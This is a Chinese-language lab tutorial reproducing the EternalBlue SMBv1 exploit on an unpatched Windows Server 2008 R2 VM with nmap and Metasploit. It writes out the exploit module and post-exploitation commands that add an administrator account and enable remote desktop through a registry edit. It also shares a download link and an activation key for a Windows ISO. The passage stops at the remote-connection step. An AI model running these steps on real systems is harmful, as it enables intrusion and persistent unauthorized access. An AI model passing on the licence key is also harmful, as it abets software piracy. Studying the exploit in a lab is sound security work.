永恒之蓝（CVE-2017-0146）详细复现

一、复现环境

攻击机：Linux kali 2023

靶机：Windows Server 2008 R2 企业版（无补丁）

通过网盘分享的文件：Windows Server 2008 R2 企业版 17in1.iso

链接: https://pan.baidu.com/s/16Oe2CoJ0yFr9IobXRqcJsw?pwd=3ub2 提取码: 3ub2

激活密钥：489J6-VHDMP-X63PK-3K798-CPX3Y

二、漏洞信息

1、漏洞编号

CVE-2017-0146

2、漏洞原理

永恒之蓝漏洞通过 445和139端口，来利用 SMBv1 和 NBT 中的远程代码执行漏洞，通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网，即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

SMB（全称是Server Message Block）是一个协议服务器信息块，是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源。

3、影响版本

目前已知受影响的 Windows 版本包括但不限于：WindowsNT，Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

三、复现过程

1、查看靶机IP：

得到靶机IP：192.168.155.182

1. 端口扫描

nmap -p- --min-rate 1000 IP

靶机开启了445端口

使用脚本进行扫描

 Nmap –script=vuln 192.168.155.182 -v

觉得等的久的可以看看进度

3、攻击

打开console

search ms17_010

其中exploit是攻击模块，auxiliary是扫描模块

尝试使用扫描模块扫描靶机看是否存在漏洞

use 24

set rhost 192.168.155.182

run

显示结果如下，如果存在Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7600 x64 (64-bit)则说明大概率存在永恒之蓝漏洞

使用攻击模块进行攻击：

use exploit/windows/smb/ms17_010_eternalblue

执行结果如下：

成功获取到shell，单数数据呈现乱码状态

输入：chcp 65001 转换编码格式可解决乱码问题

获取shell后查看当前策略：

 Net accounts

没有显示密码复杂程度，但是server一般比较复杂

添加用户： net user isme Passw0rd! /add

或者查看完整的密码配置：

secedit /export /cfg gp.txt  && notepad gp.txt 

添加用户到管理组：

net localgroup administrators isme /add

查看端口开启：

netstat -ano

开启远程桌面连接：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

再次查看端口，发现3389端口已经启动：

尝试连接（连接需要关闭防火墙）：